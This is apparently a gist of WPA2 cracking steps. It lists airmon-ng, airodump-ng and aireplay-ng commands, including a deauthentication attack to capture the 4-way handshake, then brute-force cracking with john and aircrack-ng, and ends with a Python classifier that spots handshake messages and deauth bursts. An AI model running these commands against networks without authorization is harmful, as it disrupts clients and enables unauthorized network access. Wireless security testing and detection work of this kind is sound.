Created
November 16, 2020 16:45
WPA2 Cracking Basic Operations
Start monitor mode on a usable interface:
airmon-ng start $interface

Dump all found APs with their BSSID, channel, etc.:
airodump-ng -i -g -w allAPs.out $interface
  -i  only saves IVs
  -g  tries to get GPS coords
  -w  dump file prefix

For each entry in the dump file, run airodump-ng again against a specific AP to capture packets:
airodump-ng -c $channel_ID --bssid $AP_mac -w $APname.out $interface

Run a de-auth attack against the same AP from the previous airodump-ng run to try and capture the 4-way handshake:
aireplay-ng -0 1 -a $AP_mac $interface

How to determine if a handshake has been detected?
1. Visually inspect the airodump-ng output
2. Use Wireshark and apply a filter of "eapol". This displays only the EAPOL packets you are interested in, so you can see whether the capture contains 1, 2, 3 or 4 EAPOL packets.

Send the pcap file to be cracked once a handshake has been detected:
john --stdout --incremental=All | aircrack-ng -b $AP_mac -w - *.cap
(use the incremental mode name your John version defines; "All" was renamed "ASCII" in newer jumbo builds)
OR
use a dictionary file, either with mutations from john or straight to aircrack-ng

NOTE: cracking of a WPA PSK will only work (in a reasonable amount of time) if the password is short (closer to 8 chars than 63) and/or is based on a dictionary word

the only part that needs to be written is the Wireshark filter
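The handshake check in step 2 above, written out as a capture-side classifier (an added example, not part of the original gist): it does what the "eapol" Wireshark filter does, telling which of the four EAPOL-Key messages a capture holds, and it also counts the deauthentication frames that a forced re-handshake leaves behind, which is the signal a wireless IDS watches for. The BSSID, client MAC and sample frames are constructed inline; the frames are raw 802.11 without a radiotap header.

```python
import struct
from collections import Counter
AP = bytes.fromhex("001122334455")                  # constructed AP BSSID (hypothetical)
STA = bytes.fromhex("66778899aabb")                 # constructed client MAC (hypothetical)
LLC_SNAP_EAPOL = bytes.fromhex("aaaa03000000888e")  # LLC/SNAP header, EtherType 0x888E
HANDSHAKE = ("M1", "M2", "M3", "M4")

def mgmt_deauth(src, dst, bssid, reason=7):  # raw 802.11 deauth: type 0, subtype 12, no radiotap
    return struct.pack("<HH", 0x00C0, 0) + dst + src + bssid + b"\x00\x00" + struct.pack("<H", reason)

def data_eapol_key(src, dst, bssid, key_info, from_ds):  # plain data frame carrying one EAPOL-Key
    fc = 0x0208 if from_ds else 0x0108                   # byte0 0x08 = data; byte1 FromDS / ToDS flag
    hdr = struct.pack("<HH", fc, 0) + dst + src + bssid + b"\x00\x00"
    key = bytes([2]) + struct.pack(">H", key_info) + bytes(92)  # RSN descriptor, Key Info, zeroed rest
    eapol = bytes([2, 3]) + struct.pack(">H", len(key)) + key   # EAPOL v2, packet type 3 = Key
    return hdr + LLC_SNAP_EAPOL + eapol

def classify(frame):  # -> 'deauth', 'M1'..'M4' (4-way handshake message) or None
    if len(frame) < 24:
        return None
    fc0, fc1 = frame[0], frame[1]
    ftype, subtype = (fc0 >> 2) & 3, fc0 >> 4
    if ftype == 0 and subtype == 12:
        return "deauth"
    if ftype != 2 or fc1 & 0x40:  # not a data frame, or Protected bit set (encrypted payload)
        return None
    hdr = 24 + (2 if subtype & 0x08 else 0) + (6 if (fc1 & 0x03) == 0x03 else 0)  # QoS ctl, Addr4
    eapol = frame[hdr + 8:] if frame[hdr:hdr + 8] == LLC_SNAP_EAPOL else b""
    if len(eapol) < 7 or eapol[1] != 3 or eapol[4] not in (2, 254):  # EAPOL-Key, RSN/WPA descriptor
        return None
    info = struct.unpack(">H", eapol[5:7])[0]
    ack, mic, install, secure = info & 0x80, info & 0x100, info & 0x40, info & 0x200
    if ack and not mic:                 return "M1"  # ANonce from the AP
    if mic and not ack and not secure:  return "M2"  # SNonce + MIC from the client
    if ack and mic and install:         return "M3"  # GTK delivery, Install set
    if mic and not ack and secure:      return "M4"  # client confirmation
    return None

def summarize(frames, deauth_threshold=5):  # counts, handshake messages seen, deauth burst flag
    counts = Counter(c for c in map(classify, frames) if c)
    return {"counts": dict(counts), "handshake_messages": [m for m in HANDSHAKE if counts[m]],
            "full_handshake": all(counts[m] for m in HANDSHAKE),
            "deauth_burst": counts["deauth"] >= deauth_threshold}

SAMPLE = [mgmt_deauth(AP, STA, AP)] * 6 + [  # constructed: six spoofed deauths, then a full handshake
    data_eapol_key(AP, STA, AP, 0x008A, True),   # M1: Ack set, no MIC
    data_eapol_key(STA, AP, AP, 0x010A, False),  # M2: MIC set, no Ack
    data_eapol_key(AP, STA, AP, 0x13CA, True),   # M3: Ack + MIC + Install + Secure
    data_eapol_key(STA, AP, AP, 0x030A, False),  # M4: MIC + Secure, no Ack
]
```

`summarize(SAMPLE)` reports all four messages, `full_handshake` true and `deauth_burst` true; on a real capture, feed it the 802.11 frames with the radiotap header stripped.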